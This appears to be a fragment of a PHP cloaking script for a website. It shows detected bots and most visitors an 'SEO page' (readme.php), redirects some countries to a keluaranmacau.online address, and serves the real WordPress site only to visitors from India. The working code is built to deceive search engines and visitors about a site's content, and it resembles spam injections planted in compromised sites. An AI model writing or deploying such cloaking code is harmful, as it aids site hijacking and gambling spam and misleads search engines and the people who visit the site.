function get_country($ip) { $json = @file_get_contents("http://ip-api.com/json/$ip?fields=countryCode"); if (!$json) return 'UNKNOWN'; $data = json_decode($json, true); return $data['countryCode'] ?? 'UNKNOWN'; } // ====================== // MAIN // ====================== // 1. BOT → SEO PAGE if (is_bot($ua)) { include __DIR__ . '/readme.php'; exit; } // 2. GET COUNTRY $country = get_country($ip); // 3. BLOCKED COUNTRIES → REDIRECT if (in_array($country, ['PH', 'VN', 'KH'])) { header("Location: https://keluaranmacau.online/block%20country.png"); exit; } // 4. INDIA → WORDPRESS NORMAL if ($country === 'IN') { include __DIR__ . '/indexx.php'; // WP kamu exit; } // 5. OTHER → DEFAULT include __DIR__ . '/readme.php'; exit; ?>